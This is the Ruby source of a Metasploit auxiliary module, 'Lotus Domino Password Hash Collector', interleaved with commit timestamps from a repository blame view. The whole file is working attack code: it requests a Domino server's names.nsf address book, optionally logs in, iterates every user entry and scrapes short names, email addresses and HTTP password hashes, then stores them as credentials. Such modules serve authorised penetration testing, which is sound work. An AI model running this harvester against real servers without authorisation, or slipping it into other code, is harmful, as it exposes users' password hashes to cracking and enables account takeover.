metasploit-framework/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb

188 lines
6.0 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Lotus Domino Password Hash Collector',
'Description' => 'Get users passwords hashes from names.nsf page',
'Author' => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('NOTES_USER', [false, 'The username to authenticate as', '']),
OptString.new('NOTES_PASS', [false, 'The password for the specified username' ]),
2017-05-07 06:37:48 +00:00
OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf'])
])
2013-08-30 21:28:54 +00:00
end
def run_host(ip)
2017-05-07 06:37:48 +00:00
user = datastore['NOTES_USER']
pass = datastore['NOTES_PASS']
@uri = normalize_uri(datastore['URI'])
2013-08-30 21:28:54 +00:00
2017-05-07 06:37:48 +00:00
if user.eql?('') && pass.eql?('')
print_status("#{peer} - Lotus Domino - Trying dump password hashes without credentials")
2013-08-30 21:28:54 +00:00
begin
res = send_request_raw({
'method' => 'GET',
2017-05-07 06:37:48 +00:00
'uri' => "#{@uri}\/$defaultview?Readviewentries",
2013-08-30 21:28:54 +00:00
}, 25)
if res.nil?
2017-05-07 06:37:48 +00:00
print_error('Connection failed')
2013-08-30 21:28:54 +00:00
return
end
2017-05-07 06:37:48 +00:00
if res && res.body.to_s =~ /\<viewentries/
print_good("#{peer} - Lotus Domino - OK names.nsf accessible without credentials")
2013-08-30 21:28:54 +00:00
cookie = ''
2017-05-07 06:37:48 +00:00
get_views(cookie, @uri)
2013-08-30 21:28:54 +00:00
2017-05-07 06:37:48 +00:00
elsif res && res.body.to_s =~ /names.nsf\?Login/
print_error("#{peer} - Lotus Domino - The remote server requires authentication")
2013-08-30 21:28:54 +00:00
return :abort
else
2017-05-07 06:37:48 +00:00
print_error("#{peer} - Lotus Domino - Unrecognized #{res.code} response")
vprint_error(res.to_s)
2013-08-30 21:28:54 +00:00
return :abort
end
2017-05-07 06:37:48 +00:00
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
2013-08-30 21:28:54 +00:00
end
else
2017-05-07 06:37:48 +00:00
print_status("#{peer} - Lotus Domino - Trying dump password hashes with given credentials")
2013-08-30 21:28:54 +00:00
do_login(user, pass)
end
end
2017-05-07 06:37:48 +00:00
def do_login(user = nil, pass = nil)
2013-08-30 21:28:54 +00:00
post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/names.nsf?Login',
2017-05-07 06:37:48 +00:00
'data' => post_data
2013-08-30 21:28:54 +00:00
}, 20)
if res.nil?
2017-05-07 06:37:48 +00:00
print_error("#{peer} - Connection timed out")
2013-08-30 21:28:54 +00:00
return
end
2017-05-07 06:37:48 +00:00
if res && res.code == 302
if res.get_cookies =~ /DomAuthSessId=(.*);(.*)/i
2013-08-30 21:28:54 +00:00
cookie = "DomAuthSessId=#{$1}"
2017-05-07 06:37:48 +00:00
elsif res.get_cookies =~ /LtpaToken=(.*);(.*)/i
2013-08-30 21:28:54 +00:00
cookie = "LtpaToken=#{$1}"
else
2017-05-07 06:37:48 +00:00
print_error("#{peer} - Lotus Domino - Unrecognized 302 response")
2013-08-30 21:28:54 +00:00
return :abort
end
2017-05-07 06:37:48 +00:00
print_good("#{peer} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
print_status("#{peer} - Lotus Domino - Getting password hashes")
get_views(cookie, @uri)
2013-08-30 21:28:54 +00:00
2017-05-07 06:37:48 +00:00
elsif res && res.body.to_s =~ /names.nsf\?Login/
print_error("#{peer} - Lotus Domino - Authentication error: failed to login as '#{user}'")
return :abort
2013-08-30 21:28:54 +00:00
else
2017-05-07 06:37:48 +00:00
print_error("#{peer} - Lotus Domino - Unrecognized #{res.code} response")
2013-08-30 21:28:54 +00:00
return :abort
end
2017-05-07 06:37:48 +00:00
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
2013-08-30 21:28:54 +00:00
end
end
2017-05-07 06:37:48 +00:00
def get_views(cookie, uri)
2013-08-30 21:28:54 +00:00
begin
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}\/$defaultview?Readviewentries",
2017-05-07 06:37:48 +00:00
'cookie' => cookie
2013-08-30 21:28:54 +00:00
}, 25)
2017-05-07 06:37:48 +00:00
if res && res.body
max = res.body.scan(/siblings=\"(.*)\"/).first.join
2013-08-30 21:28:54 +00:00
2017-05-07 06:37:48 +00:00
1.upto(max.to_i) do |i|
2013-08-30 21:28:54 +00:00
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}\/$defaultview?Readviewentries&Start=#{i}",
2017-05-07 06:37:48 +00:00
'cookie' => cookie
2013-08-30 21:28:54 +00:00
}, 25)
2017-05-07 06:37:48 +00:00
view_id = res.body.scan(/unid="([^\s]+)"/)[0].join
dump_hashes(view_id, cookie, uri)
end
2013-08-30 21:28:54 +00:00
end
2017-05-07 06:37:48 +00:00
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
2013-08-30 21:28:54 +00:00
end
end
2017-05-07 06:37:48 +00:00
def dump_hashes(view_id, cookie, uri)
2013-08-30 21:28:54 +00:00
begin
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}\/$defaultview/#{view_id}?OpenDocument",
2017-05-07 06:37:48 +00:00
'cookie' => cookie
2013-08-30 21:28:54 +00:00
}, 25)
2017-05-07 06:37:48 +00:00
if res && res.body
2013-08-30 21:28:54 +00:00
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
2013-08-30 21:28:54 +00:00
2017-05-07 06:37:48 +00:00
short_name = 'NULL' if short_name.to_s.strip.empty?
user_mail = 'NULL' if user_mail.to_s.strip.empty?
pass_hash = 'NULL' if pass_hash.to_s.strip.empty?
2013-08-30 21:28:54 +00:00
2017-05-07 06:37:48 +00:00
print_good("#{peer} - Lotus Domino - Account Found: #{short_name}, #{user_mail}, #{pass_hash}")
2013-08-30 21:28:54 +00:00
if pass_hash != 'NULL'
domino_svc = report_service(
:host => rhost,
:port => rport,
2017-05-07 06:37:48 +00:00
:name => (ssl ? 'https' : 'http')
2013-08-30 21:28:54 +00:00
)
report_auth_info(
:host => rhost,
:port => rport,
2017-05-07 06:37:48 +00:00
:sname => (ssl ? 'https' : 'http'),
2013-08-30 21:28:54 +00:00
:user => short_name,
:pass => pass_hash,
2017-05-07 06:37:48 +00:00
:ptype => 'domino_hash',
:source_id => domino_svc.id,
:source_type => 'service',
2013-08-30 21:28:54 +00:00
:proof => "WEBAPP=\"Lotus Domino\", USER_MAIL=#{user_mail}, HASH=#{pass_hash}, VHOST=#{vhost}",
:active => true
)
end
end
2017-05-07 06:37:48 +00:00
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
2013-08-30 21:28:54 +00:00
end
end
end